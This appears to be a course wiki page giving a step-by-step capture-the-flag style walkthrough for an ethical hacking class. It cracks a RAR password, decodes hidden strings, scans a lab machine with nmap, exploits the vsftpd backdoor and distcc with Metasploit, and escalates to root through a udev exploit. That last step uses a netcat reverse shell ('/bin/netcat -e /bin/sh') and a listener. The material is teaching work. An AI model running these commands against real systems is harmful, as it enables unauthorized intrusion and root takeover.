Final Project - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

Background

  • You are working in a company called ‘Workaround’ as a penetration tester.
  • During work on a project that your manager assigned to you, you receive an email from Ian, the IT department manager.
  • Roger, your manager, asks you to address the message and help Ian.

Ian's Email

Hello team,
Recently, our Web Development Manager, Jessica, was fired. In addition to the classified reason she was let go,
we also suspect she was hiding information.
We managed to reset her password and access her computer, but didn’t find anything outwardly incriminating.
However, we do know that Jessica helped employees with web development (not as part of a company project
and against company regulations) and suspect that somehow she managed to hide that fact via a web-based
application.
The only thing we found is an encrypted compressed file called ‘Additional Files’ on her desktop.
The file seems out of place, but we cannot find any matching password for it. We even tried her birthday
combination, and the names of both her husband and daughter, but nothing matches.
Can you please help obtain the password for the compressed file and find out what Jessica was hiding?
Thank you,
IT Department Manager,
Ian Tucker

Mission

  • As a penetration tester, you are to assist Ian in the investigation.
  • Perform the specified steps and solve them one-byone to reach the final answer.
  • The file you have to work on is CrackMeIfYouCan.rar.

Mission Steps

  1. Find out the password for the compressed file.
  2. Study the compressed file’s content and investigate any suspicious looking files.
  3. You begin to understand that when linked together, the files comprise a customized website with a login page, but one of the files is not part of the website. Investigate the website to obtain another clue that will lead you to the next stage.
  4. It appears that in the website’s source code an encoded string was hidden. The string is a clue for the next stage.
  5. The encoded string is decoded to a PHP code that can be used as a PHP file. The file can guide you to the next step.
  6. When you scan the network, you discover a Linux machine that isn’t part of the original workspace. Investigate that machine to find a way inside it and continue the investigation.
  7. A scan of the machine reveals many open ports, and Ian asks you to export the results to an XML file, so he can review it. Ian requests that you try to find vulnerabilities in Vsftpd and Samba, since he knows Jessica specializes in those services. Your task is to try to obtain access to the machine via each of those services.
  8. As a first step in your investigation of the services, you access the system and try to elevate your privileges to root access level.
  9. Navigating in the system, you find that the udev process is running, enumerate its version, and notice that it can be used for privilege escalation.
  10. After obtaining root access to the machine, Ian asks you to find out the hash for the root user.

Task 1: Cracking Files

Step 1

  • Transfer CrackMeIfYouCan.rar from the additional files provided to your Kali OS machine.

Step 2

  • Crack the .rar file's password and extract the files.
  1. Open terminal
  2. cd /root/Desktop
  3. rar2john CrackMeIfYouCan.rar
  4. rar2john CrackMeIfYouCan.rar > hash
  5. john hash

Task 2: File Investigation

Step 1

  • Explore the extracted files and search for interesting information.
  1. Create a new folder on the desktop named finalproject
  2. Open the .rar file using the password letmein
  3. Extract the contents of the .rar to the finalproject folder
  4. Open the secret only I would know.txt file

Step 2

  • Decipher the interesting information.
  1. Open a browser and navigate to https://hashes.com/en/decrypt/hash
  2. submit the hash values from the previous file
  3. This reveals the plain text passwords

Step 3

  • Two of the extracted files may look familiar. Find out how you can use those files and implement the credentials.
  1. in terminal use cd finalproject/
  2. mv index.php style.css /var/www/html/
  3. service apache2 start
  4. Browse to http://127.0.0.1/index.php
  5. Use the username: xyzxyz and password: Pa$$w0rd to login

Step 4

  • Examine the webpage for additional clues.
  1. View the source code of the webpage (there is a base64 encoded message hidden in the code)
  2. Open a new tab and go to https://www.base64decode.net/
  3. Paste the encoded message and click on decode
  4. Review the decoded message (There is another hidden base64 coded message within)
  5. Repeat the decoding process on the newly obtained coded message

Step 5

  • Use the clues to identify the target.
  1. In terminal run netdiscover to reveal the target

Task 3: Vulnerability Scanning

Step 1

  • Find open ports on the machine and display the results in webpage format.
  1. Open a new terminal
  2. nmap -O -sV -sC -oX /root/Desktop/output.xml [target IP]
  3. Drag the XML file to the browser and view the collected information.

Step 2

  • Find two ways of gaining access to the machine for the vsftpd and samba protocol vulnerabilities. The last connected session should be to a service hosted on port 3632.

  • Note: Between each stage of a Metasploit session, exit and create a new one.

  • For vsftpd

    • First way
    1. telnet 21
    2. USER: anonymous
    3. PASSWORD: (BLANK)
    4. Use CRTL+] to quit
    • Second way
    1. msfconsole
    2. search vsftpd
    3. use exploit/unix/ftp/vsftpd_234_backdoor
    4. show options
    5. set RHOST
    6. run
    7. exit

  • For samba

    • first way
    1. msfconsole
    2. use exploit/unix/misc/distcc_exec
    3. show options
    4. set RHOSTS
    5. run
    6. Ctrl+C and then y to quit
    • Second way
    1. smbclient ///tmp
    2. exit

Task 4: Privilege Escalation

Step 1

  • Locate the udev vulnerable process.
  1. In the metasploitable session tab use ps aux
  2. dpkg -l |grep “udev”

Step 2

  • Search for the udev exploit file and place it on a web server to enable access from the remote connection.
  1. Open a new terminal tab
  2. msfconsole
  3. search udev
  4. In another tab run cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html

Step 3

  • Read how to use the exploit and prepare it for execution on the remote machine.
  1. service apache2 start
  2. cat /var/www/html/8572.c to review how to use the udev exploit
  3. In the Msvenom sesion tab run wget /8572.c
  4. gcc 8572.c –o output
  5. touch run
  6. echo ‘#!/bin/sh’ >> run
  7. echo ‘/bin/netcat –e /bin/sh ’ >> run

Step 4

  • Create a listener and execute the exploit. Note the established connection with high privileges.
  1. cat /proc/net/netlink to get the PID
  2. In a different terminal tab, set a listener on port 5000 by running nc -lvnp 5000
  3. In the Msfconsole session, run the following: chmod +x output then ./output
  4. Switch back to the listener tab and note the newly added line after the execution of the file output.
  5. Note the user using the whoami command from the created socket. You should be connected as the root user.
⚠️ **GitHub.com Fallback** ⚠️